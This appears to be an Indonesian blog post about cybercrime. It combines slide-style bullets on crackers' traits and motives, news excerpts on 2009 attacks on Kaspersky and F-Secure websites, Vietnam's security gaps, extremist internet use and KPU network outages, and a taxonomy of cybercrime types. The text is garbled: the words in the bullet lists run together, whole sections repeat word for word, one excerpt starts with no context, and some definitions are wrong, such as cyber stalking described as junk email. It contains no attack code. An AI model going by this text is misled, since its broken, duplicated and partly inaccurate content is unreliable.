•MenguasaisistemoperasiUNIX atauVMS
•Sukamengoleksisoftware atauhardware lama
•Terhubungkeinternet untukmenjalankan aksinya
•Melakukanaksinyapadamalamhari, dengan alasanwaktuyang memungkinkan, jalur
komunikasitidakpadat, tidakmudahdiketahui oranglain
–Penyebabcracker melakukanpenyerangan:
•spite, kecewa, balas dendam
•sport, petualangan
•profit, mencarikeuntungandariimbalan
oranglain
•stupidity, mencariperhatian
•cruriosity, mencariperhatian
•politics, alasanpolitis
–Ciri-ciritarget yang dibobolcracker :
•Sulitditentukan
•Biasanyaorganisasibesardanfinancial dengansistem pengamananyang canggih
•Bilayang diboboljaringankecilbiasanyasistem pengamanannyalemah, dan pemiliknya barudalam bidang internet
–Ciri-ciritarget yang “berhasil”dibobolcracker :
•Penggunabisamengakses, bisamasukkejaringantanpa“nama”dan“password”
•Pengganggubisamengakses, merusak, mengubahatau sejenisnyaterhadapdata
•Pengganggubisamengambilalihkendalisistem
•Sistemhang, gagalbekerja, reboot atausistemberada
Dalamkondisitidakdapatdioperasikan
Setelah Kaspersky, Giliran F-Secure Dipermalukan Cracker
Denpasar - Seolah ingin menantang dan mencoreng reputasi perusahaan-perusahaan
keamanan, cracker melancarkan serangan ke situs-situs vendor keamanan komputer
tersebut.
Setelah sebelumnya mempermalukan Kaspersky Lab dengan melancarkan serangan SQL ke situsnya, kini giliran F-Secure yang menjadi bulan-bulanan, demikian seperti dikutip detikINET dari Searchsecurity, Jumat (13/2/2009).
Pelaku serangan ke situs F-secure ini disinyalir merupakan orang yang sama dengan pelaku serangan ke situs Kaspersky, yakni cracker Romania dari HackersBlog.
Cracker tersebut mengeksploitasi celah pada kode yang terdapat di situs vendor keamanan
Finlandia tersebut. Kemudian membeberkan screen shot SQL Server Information dan tabel database.
Setali tiga uang dengan Kaspersky, F-Secure juga berusaha meyakinkan bahwa tim TI mereka
telah sigap mematikan server yang diserang dan menggelar investigasi untuk menyelidiki
masalah ini. F-secure juga menegaskan bahwa tidak ada sistem lain yang diobok-obok cracker.
Dikutip Dari DetikInet.com
Namun ironisnya, banyak perusahaan di Vietnam tidak mempunyai sistem keamanan yang mumpuni. Selain itu, kurangnya perlindungan terhadap penjahat cyber menyebabkan hampir 60 juta komputer yang terinfeksi virus dan 461 situs diserang oleh hacker.
Seperti yang dilansir Vietnam News Agency, Kamis (26/3/2009), tahun lalu dari 40 kasus kejahatan dunia maya. Telah menyebabkan negara Uncle Ho itu mengalami kerugian sedikitnya USD1,76 miliar. Dan tentu saja, ini membuat Vietnam ketar-ketir.
Ini semakin diperparah dengan minimnya sistem pengamanan di berbagai perusahaan. Dari data yang dikeluarkan, tujuh puluh persen perusahaan belum memiliki perjanjian resmi tentang sistem keamanan internet. Bahkan delapan puluh persen, tidak mengetahui informasi tentang sistem informasi keamanan yang jelas.
Untuk itulah, demi melindungi asetnya, Vietnam tengah menggeber penggunaan sistem keamanan yang memadai bagi perusahaan. Terlebih, pertumbuhan internet di sana sangat menunjang pertumbuhan ekonomi mereka
2 SINGAPURA - Penggunaan media internet oleh para teroris di Asia Tenggara menunjukan peningkatan yang signifikan, kelompok yang sering dituding oleh dunia barat sebagai ekstrimis itu menggunakan ranah maya untuk menyebarkan ide radikal, merekut serta melatih para anggotanya.
Temuan yang dilakukan oleh Sekolah Internasional S Rajaratnam Singapura dan Institut Strategi Kepolisian Australian memberitahu kalau, banyak pihak keamanan di Asia Tenggara yang sukses bisa mendeteksi keberadaan sebuah bom, tapi mereka tidak mengerti bagaimana bom itu dibuat."Indikasi yang menunjukan kalau peningkatan ini terjadi salah satunya adalah, makin banyaknya kelompok ekstrimis mengunggah video melalui internet mengenai cara membuat dan menggunakan bom," terang juru bicara
Sekolah Rajaratman, seperti yang dilansir AFP, Senin (20/4/2009).
Menurut data yang mereka himpun, hingga 2008 lalu sudah ada 117 situs tentang kelompok radikal ini. Padahal, pada 2007 sebelumnya, situs seperti ini hanya berjumlah tidak kurang dari 15 saja. Dan kebanyakan dari situs tersebut, berbasis di Indonesia dan Filipiina "Kita harus memperhatikan dengans serius pertumbuhan dan pergerakan kelompok radikal online tersebut," tadas juru bicara tersebut
3 Jaringan Internet KPU Diserang Oleh 'Cybercrime'
Jaringan internet di Pusat Tabulasi Nasional Komisi Pemilihan Umum sempat down (terganggu) beberapa kali. Untuk menangani kasus kriminal di dunia maya yang biasa disebut cybercrime, Komisi Pemilihan Umum sudah menggandeng kepolisian. "Cybercrime polisi juga sudah membantu. Domain kerjasamanya antara KPU dengan kepolisian," kata Ketua Tim Teknologi Informasi KPU, Husni Fahmi,di Kantor KPU, Jalan Imam Bonjol, Menteng, Jakarta Pusat, Rabu, 15 April 2009.
BeberapaBentukAncamanJaringan
•Phreaking
Perilakumenjadikansistempengamananteleponmelemah
•Hacker
–Orangyang secaradiam-diammempelajarisistem yang iasanyasukardimengertiuntuk kemudian mengelolanyadanmen-share hasilujicoba yang dilakukannya.
–Hacker tidakmerusaksistem
•Craker
–Orangyang secaradiam-diammempelajarisistem denganmaksudjahat
–Munculkarenasifatdasarmanusiayang selaluingin membangun(salahsatunyamerusak)
•Cracker
–Ciri-ciricracker :
•Bisamembuatprogram C, C++ ataupearl
•MemilikipengetahuanTCP/IP
•Menggunakaninternet lebihdari50 jam per-
bulan
•MenguasaisistemoperasiUNIX atauVMS
•Sukamengoleksisoftware atauhardware lama
•Terhubungkeinternet untukmenjalankan aksinya
•Melakukanaksinyapadamalamhari, dengan alasanwaktuyang memungkinkan, jalur
komunikasitidakpadat, tidakmudahdiketahui oranglain
–Penyebabcracker melakukanpenyerangan:
•spite, kecewa, balas dendam
•sport, petualangan
•profit, mencarikeuntungandariimbalan
oranglain
•stupidity, mencariperhatian
•cruriosity, mencariperhatian
•politics, alasanpolitis
–Ciri-ciritarget yang dibobolcracker :
•Sulitditentukan
•Biasanyaorganisasibesardanfinancial dengansistem pengamananyang canggih
•Bilayang diboboljaringankecilbiasanyasistem pengamanannyalemah, dan pemiliknya barudalam bidang internet
–Ciri-ciritarget yang “berhasil”dibobolcracker :
•Penggunabisamengakses, bisamasukkejaringantanpa“nama”dan“password”
•Pengganggubisamengakses, merusak, mengubahatau sejenisnyaterhadapdata
•Pengganggubisamengambilalihkendalisistem
•Sistemhang, gagalbekerja, reboot atausistemberada
Dalamkondisitidakdapatdioperasikan
Setelah Kaspersky, Giliran F-Secure Dipermalukan Cracker
Denpasar - Seolah ingin menantang dan mencoreng reputasi perusahaan-perusahaan
keamanan, cracker melancarkan serangan ke situs-situs vendor keamanan komputer
tersebut.
Setelah sebelumnya mempermalukan Kaspersky Lab dengan melancarkan serangan SQL ke situsnya, kini giliran F-Secure yang menjadi bulan-bulanan, demikian seperti dikutip detikINET dari Searchsecurity, Jumat (13/2/2009).
Pelaku serangan ke situs F-secure ini disinyalir merupakan orang yang sama dengan pelaku serangan ke situs Kaspersky, yakni cracker Romania dari HackersBlog.
Cracker tersebut mengeksploitasi celah pada kode yang terdapat di situs vendor keamanan
Finlandia tersebut. Kemudian membeberkan screen shot SQL Server Information dan tabel database.
Setali tiga uang dengan Kaspersky, F-Secure juga berusaha meyakinkan bahwa tim TI mereka
telah sigap mematikan server yang diserang dan menggelar investigasi untuk menyelidiki
masalah ini. F-secure juga menegaskan bahwa tidak ada sistem lain yang diobok-obok cracker.
Dikutip Dari DetikInet.com
Pengertian Cybercrime
Cybercrime adalah tidak criminal yang dilakkukan dengan menggunakan teknologi computer sebagai alat kejahatan utama. Cybercrime merupakan kejahatan yang memanfaatkan perkembangan teknologi computer khusunya internet. Cybercrime didefinisikan sebagai perbuatan melanggar hukum yang memanfaatkan teknologi computer yang berbasasis pada kecanggihan perkembangan teknologi internet.
Karakteristik Cybercrime
Dalam perkembangannya kejahatan konvensional cybercrime dikenal dengan :
1. Kejahatan kerah biru
2. Kejahatan kerah putih
Cybercrime memiliki karakteristik unik yaitu :
1. Ruang lingkup kejahatan
2. Sifat kejahatan
3. Pelaku kejahatan
4. Modus kejahatan
5. Jenis kerugian yang ditimbulkan
Dari beberapa karakteristik diatas, untuk mempermudah penanganannya maka cybercrime diklasifikasikan :
1. Cyberpiracy : Penggunaan teknologi computer untuk mencetak ulang software atau informasi, lalu mendistribusikan informasi atau software tersebut lewat teknologi komputer.
2. Cybertrespass : Penggunaan teknologi computer untuk meningkatkan akses pada system computer suatu organisasi atau indifidu.
3. Cybervandalism : Penggunaan teknologi computer untuk membuat program yang menganggu proses transmisi elektronik, dan menghancurkan data dikomputer.
c. Perkiraan perkembangan cyber crime di masa depan
dapat diperkirakan perkembangan kejahatan cyber kedepan akan semakin meningkat seiring dengan perkembangan teknologi atau globalisasi dibidang teknologi informasi dan komunikasi, sebagai berikut :
Denial of Service Attack. Serangan tujuan ini adalah untuk memacetkan sistem dengan mengganggu akses dari pengguna jasa internet yang sah. Taktik yang digunakan adalah dengan mengirim atau membanjiri situs web dengan data sampah yang tidak perlu bagi orang yang dituju. Pemilik situs web menderita kerugian, karena untuk mengendalikan atau mengontrol kembali situs web tersebut dapat memakan waktu tidak sedikit yang menguras tenaga dan energi.
Hate sites. Situs ini sering digunakan oleh hackers untuk saling menyerang dan melontarkan komentar-komentar yang tidak sopan dan vulgar yang dikelola oleh para “ekstrimis” untuk menyerang pihak-pihak yang tidak disenanginya. Penyerangan terhadap lawan atau opponent ini sering mengangkat pada isu-isu rasial, perang program dan promosi kebijakan ataupun suatu pandangan (isme) yang dianut oleh seseorang / kelompok, bangsa dan negara untuk bisa dibaca serta dipahami orang atau pihak lain sebagai “pesan” yang disampaikan.
Cyber Stalking adalah segala bentuk kiriman e-mail yang tidak dikehendaki oleh user atau junk e-mail yang sering memakai folder serta tidak jarang dengan pemaksaan. Walaupun e-mail “sampah” ini tidak dikehendaki oleh para user.
3. Jenis-jenis Cybercrime
a. Jenis-jenis cybercrime berdasarkan jenis aktivitasnya
1. Unauthorized Access to Computer System and Service
Kejahatan yang dilakukan dengan memasuki/menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Biasanya pelaku kejahatan (hacker) melakukannya dengan maksud sabotase ataupun pencurian informasi penting dan rahasia. Namun begitu, ada juga yang melakukan hanya karena merasa tertantang untuk mencoba keahliannya menembus suatu sistem yang memiliki tingkat proteksi tinggi. Kejahatan ini semakin marak dengan berkembangnya teknologi internet/intranet.
Kita tentu tidak lupa ketika masalah Timor Timur sedang hangat-hangatnya dibicarakan di tingkat internasional, beberapa website milik pemerintah RI dirusak oleh hacker (Kompas, 11/08/1999). Beberapa waktu lalu, hacker juga telah berhasil menembus masuk ke dalam database berisi data para pengguna jasa America Online (AOL), sebuah perusahaan Amerika Serikat yang bergerak dibidang e-commerce, yang memiliki tingkat kerahasiaan tinggi (Indonesian Observer, 26/06/2000). Situs Federal Bureau of Investigation (FBI) juga tidak luput dari serangan para hacker, yang mengakibatkan tidak berfungsinya situs ini dalam beberapa waktu lamanya.
2. Illegal Contents
Merupakan kejahatan dengan memasukkan data atau informasi ke internet tentang sesuatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau mengganggu ketertiban umum. Sebagai contohnya adalah pemuatan suatu berita bohong atau fitnah yang akan menghancurkan martabat atau harga diri pihak lain, hal-hal yang berhubungan dengan pornografi atau pemuatan suatu informasi yang merupakan rahasia negara, agitasi dan propaganda untuk melawan pemerintahan yang sah, dan sebagainya.
3. Data Forgery
Merupakan kejahatan dengan memalsukan data pada dokumen-dokumen penting yang tersimpan sebagai scriptless document melalui internet. Kejahatan ini biasanya ditujukan pada dokumen-dokumen e-commerce dengan membuat seolah-olah terjadi “salah ketik” yang pada akhirnya akan menguntungkan pelaku.
4. Cyber Espionage
Merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer (computer network system) pihak sasaran. Kejahatan ini biasanya ditujukan terhadap saingan bisnis yang dokumen ataupun data-data pentingnya tersimpan dalam suatu sistem yang computerized.
5. Cyber Sabotage and Extortion
Kejahatan ini dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet. Biasanya kejahatan ini dilakukan dengan menyusupkan suatu logic bomb, virus komputer ataupun suatu program tertentu, sehingga data, program komputer atau sistem jaringan komputer tidak dapat digunakan, tidak berjalan sebagaimana mestinya, atau berjalan sebagaimana yang dikehendaki oleh pelaku. Dalam beberapa kasus setelah hal tersebut terjadi, maka pelaku kejahatan tersebut menawarkan diri kepada korban untuk memperbaiki data, program komputer atau sistem jaringan komputer yang telah disabotase tersebut, tentunya dengan bayaran tertentu. Kejahatan ini sering disebut sebagai cyber-terrorism.
6. Offense against Intellectual Property
Kejahatan ini ditujukan terhadap Hak atas Kekayaan Intelektual yang dimiliki pihak lain di internet. Sebagai contoh adalah peniruan tampilan pada web page suatu situs milik orang lain secara ilegal, penyiaran suatu informasi di internet yang ternyata merupakan rahasia dagang orang lain, dan sebagainya.
7. Infringements of Privacy
Kejahatan ini ditujukan terhadap informasi seseorang yang merupakan hal yang sangat pribadi dan rahasia. Kejahatan ini biasanya ditujukan terhadap keterangan pribadi seseorang yang tersimpan pada formulir data pribadi yang tersimpan secara computerized, yang apabila diketahui oleh orang lain maka dapat merugikan korban secara materil maupun immateril, seperti nomor kartu kredit, nomor PIN ATM, cacat atau penyakit tersembunyi dan sebagainya.
8. Cracking
Kejahatan dengan menggunakan teknologi computer yang dilakukan untuk merusak system keamaanan suatu system computer dan biasanya melakukan pencurian, tindakan anarkis begitu merekan mendapatkan akses. Biasanya kita sering salah menafsirkan antara seorang hacker dan cracker dimana hacker sendiri identetik dengan perbuatan negative, padahal hacker adalah orang yang senang memprogram dan percaya bahwa informasi adalah sesuatu hal yang sangat berharga dan ada yang bersifat dapat dipublikasikan dan rahasia.
9. Carding
Adalah kejahatan dengan menggunakan teknologi computer untuk melakukan transaksi dengan menggunakan card credit orang lain sehingga dapat merugikan orang tersebut baik materil maupun non materil.
b. Jenis-jenis cybercrime berdasarkan motif
Berdasarkan motif cybercrime terbergi menjadi 2 yaitu :
Cybercrime sebagai tindak kejahatan murni : dimana orang yang melakukan kejahatan yang dilakukan secara di sengaja, dimana orang tersebut secara sengaja dan terencana untuk melakukan pengrusakkan, pencurian, tindakan anarkis, terhadap suatu system informasi atau system computer.
Cybercrime sebagai tindakan kejahatan abu-abu : dimana kejahatan ini tidak jelas antara kejahatan criminal atau bukan karena dia melakukan pembobolan tetapi tidak merusak, mencuri atau melakukan perbuatan anarkis terhadap system informasi atau system computer tersebut.
Selain dua jenis diatas cybercrime berdasarkan motif terbagi menjadi
Cybercrime yang menyerang individu : kejahatan yang dilakukan terhadap orang lain dengan motif dendam atau iseng yang bertujuan untuk merusak nama baik, mencoba ataupun mempermaikan seseorang untuk mendapatkan kepuasan pribadi. Contoh : Pornografi, cyberstalking, dll
Cybercrime yang menyerang hak cipta (Hak milik) : kejahatan yang dilakukan terhadap hasil karya seseorang dengan motif menggandakan, memasarkan, mengubah yang bertujuan untuk kepentingan pribadi/umum ataupun demi materi/nonmateri.
Cybercrime yang menyerang pemerintah : kejahatan yang dilakukan dengan pemerintah sebagai objek dengan motif melakukan terror, membajak ataupun merusak keamanan suatu pemerintahan yang bertujuan untuk mengacaukan system pemerintahan, atau menghancurkan suatu Negara
Karakteristik Cybercrime
Dalam perkembangannya kejahatan konvensional cybercrime dikenal dengan :
1. Kejahatan kerah biru
2. Kejahatan kerah putih
Cybercrime memiliki karakteristik unik yaitu :
1. Ruang lingkup kejahatan
2. Sifat kejahatan
3. Pelaku kejahatan
4. Modus kejahatan
5. Jenis kerugian yang ditimbulkan
Dari beberapa karakteristik diatas, untuk mempermudah penanganannya maka cybercrime diklasifikasikan :
1. Cyberpiracy : Penggunaan teknologi computer untuk mencetak ulang software atau informasi, lalu mendistribusikan informasi atau software tersebut lewat teknologi komputer.
2. Cybertrespass : Penggunaan teknologi computer untuk meningkatkan akses pada system computer suatu organisasi atau indifidu.
3. Cybervandalism : Penggunaan teknologi computer untuk membuat program yang menganggu proses transmisi elektronik, dan menghancurkan data dikomputer.
c. Perkiraan perkembangan cyber crime di masa depan
dapat diperkirakan perkembangan kejahatan cyber kedepan akan semakin meningkat seiring dengan perkembangan teknologi atau globalisasi dibidang teknologi informasi dan komunikasi, sebagai berikut :
Denial of Service Attack. Serangan tujuan ini adalah untuk memacetkan sistem dengan mengganggu akses dari pengguna jasa internet yang sah. Taktik yang digunakan adalah dengan mengirim atau membanjiri situs web dengan data sampah yang tidak perlu bagi orang yang dituju. Pemilik situs web menderita kerugian, karena untuk mengendalikan atau mengontrol kembali situs web tersebut dapat memakan waktu tidak sedikit yang menguras tenaga dan energi.
Hate sites. Situs ini sering digunakan oleh hackers untuk saling menyerang dan melontarkan komentar-komentar yang tidak sopan dan vulgar yang dikelola oleh para “ekstrimis” untuk menyerang pihak-pihak yang tidak disenanginya. Penyerangan terhadap lawan atau opponent ini sering mengangkat pada isu-isu rasial, perang program dan promosi kebijakan ataupun suatu pandangan (isme) yang dianut oleh seseorang / kelompok, bangsa dan negara untuk bisa dibaca serta dipahami orang atau pihak lain sebagai “pesan” yang disampaikan.
Cyber Stalking adalah segala bentuk kiriman e-mail yang tidak dikehendaki oleh user atau junk e-mail yang sering memakai folder serta tidak jarang dengan pemaksaan. Walaupun e-mail “sampah” ini tidak dikehendaki oleh para user.
3. Jenis-jenis Cybercrime
a. Jenis-jenis cybercrime berdasarkan jenis aktivitasnya
1. Unauthorized Access to Computer System and Service
Kejahatan yang dilakukan dengan memasuki/menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Biasanya pelaku kejahatan (hacker) melakukannya dengan maksud sabotase ataupun pencurian informasi penting dan rahasia. Namun begitu, ada juga yang melakukan hanya karena merasa tertantang untuk mencoba keahliannya menembus suatu sistem yang memiliki tingkat proteksi tinggi. Kejahatan ini semakin marak dengan berkembangnya teknologi internet/intranet.
Kita tentu tidak lupa ketika masalah Timor Timur sedang hangat-hangatnya dibicarakan di tingkat internasional, beberapa website milik pemerintah RI dirusak oleh hacker (Kompas, 11/08/1999). Beberapa waktu lalu, hacker juga telah berhasil menembus masuk ke dalam database berisi data para pengguna jasa America Online (AOL), sebuah perusahaan Amerika Serikat yang bergerak dibidang e-commerce, yang memiliki tingkat kerahasiaan tinggi (Indonesian Observer, 26/06/2000). Situs Federal Bureau of Investigation (FBI) juga tidak luput dari serangan para hacker, yang mengakibatkan tidak berfungsinya situs ini dalam beberapa waktu lamanya.
2. Illegal Contents
Merupakan kejahatan dengan memasukkan data atau informasi ke internet tentang sesuatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau mengganggu ketertiban umum. Sebagai contohnya adalah pemuatan suatu berita bohong atau fitnah yang akan menghancurkan martabat atau harga diri pihak lain, hal-hal yang berhubungan dengan pornografi atau pemuatan suatu informasi yang merupakan rahasia negara, agitasi dan propaganda untuk melawan pemerintahan yang sah, dan sebagainya.
3. Data Forgery
Merupakan kejahatan dengan memalsukan data pada dokumen-dokumen penting yang tersimpan sebagai scriptless document melalui internet. Kejahatan ini biasanya ditujukan pada dokumen-dokumen e-commerce dengan membuat seolah-olah terjadi “salah ketik” yang pada akhirnya akan menguntungkan pelaku.
4. Cyber Espionage
Merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer (computer network system) pihak sasaran. Kejahatan ini biasanya ditujukan terhadap saingan bisnis yang dokumen ataupun data-data pentingnya tersimpan dalam suatu sistem yang computerized.
5. Cyber Sabotage and Extortion
Kejahatan ini dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet. Biasanya kejahatan ini dilakukan dengan menyusupkan suatu logic bomb, virus komputer ataupun suatu program tertentu, sehingga data, program komputer atau sistem jaringan komputer tidak dapat digunakan, tidak berjalan sebagaimana mestinya, atau berjalan sebagaimana yang dikehendaki oleh pelaku. Dalam beberapa kasus setelah hal tersebut terjadi, maka pelaku kejahatan tersebut menawarkan diri kepada korban untuk memperbaiki data, program komputer atau sistem jaringan komputer yang telah disabotase tersebut, tentunya dengan bayaran tertentu. Kejahatan ini sering disebut sebagai cyber-terrorism.
6. Offense against Intellectual Property
Kejahatan ini ditujukan terhadap Hak atas Kekayaan Intelektual yang dimiliki pihak lain di internet. Sebagai contoh adalah peniruan tampilan pada web page suatu situs milik orang lain secara ilegal, penyiaran suatu informasi di internet yang ternyata merupakan rahasia dagang orang lain, dan sebagainya.
7. Infringements of Privacy
Kejahatan ini ditujukan terhadap informasi seseorang yang merupakan hal yang sangat pribadi dan rahasia. Kejahatan ini biasanya ditujukan terhadap keterangan pribadi seseorang yang tersimpan pada formulir data pribadi yang tersimpan secara computerized, yang apabila diketahui oleh orang lain maka dapat merugikan korban secara materil maupun immateril, seperti nomor kartu kredit, nomor PIN ATM, cacat atau penyakit tersembunyi dan sebagainya.
8. Cracking
Kejahatan dengan menggunakan teknologi computer yang dilakukan untuk merusak system keamaanan suatu system computer dan biasanya melakukan pencurian, tindakan anarkis begitu merekan mendapatkan akses. Biasanya kita sering salah menafsirkan antara seorang hacker dan cracker dimana hacker sendiri identetik dengan perbuatan negative, padahal hacker adalah orang yang senang memprogram dan percaya bahwa informasi adalah sesuatu hal yang sangat berharga dan ada yang bersifat dapat dipublikasikan dan rahasia.
9. Carding
Adalah kejahatan dengan menggunakan teknologi computer untuk melakukan transaksi dengan menggunakan card credit orang lain sehingga dapat merugikan orang tersebut baik materil maupun non materil.
b. Jenis-jenis cybercrime berdasarkan motif
Berdasarkan motif cybercrime terbergi menjadi 2 yaitu :
Cybercrime sebagai tindak kejahatan murni : dimana orang yang melakukan kejahatan yang dilakukan secara di sengaja, dimana orang tersebut secara sengaja dan terencana untuk melakukan pengrusakkan, pencurian, tindakan anarkis, terhadap suatu system informasi atau system computer.
Cybercrime sebagai tindakan kejahatan abu-abu : dimana kejahatan ini tidak jelas antara kejahatan criminal atau bukan karena dia melakukan pembobolan tetapi tidak merusak, mencuri atau melakukan perbuatan anarkis terhadap system informasi atau system computer tersebut.
Selain dua jenis diatas cybercrime berdasarkan motif terbagi menjadi
Cybercrime yang menyerang individu : kejahatan yang dilakukan terhadap orang lain dengan motif dendam atau iseng yang bertujuan untuk merusak nama baik, mencoba ataupun mempermaikan seseorang untuk mendapatkan kepuasan pribadi. Contoh : Pornografi, cyberstalking, dll
Cybercrime yang menyerang hak cipta (Hak milik) : kejahatan yang dilakukan terhadap hasil karya seseorang dengan motif menggandakan, memasarkan, mengubah yang bertujuan untuk kepentingan pribadi/umum ataupun demi materi/nonmateri.
Cybercrime yang menyerang pemerintah : kejahatan yang dilakukan dengan pemerintah sebagai objek dengan motif melakukan terror, membajak ataupun merusak keamanan suatu pemerintahan yang bertujuan untuk mengacaukan system pemerintahan, atau menghancurkan suatu Negara
Langganan:
Postingan (Atom)
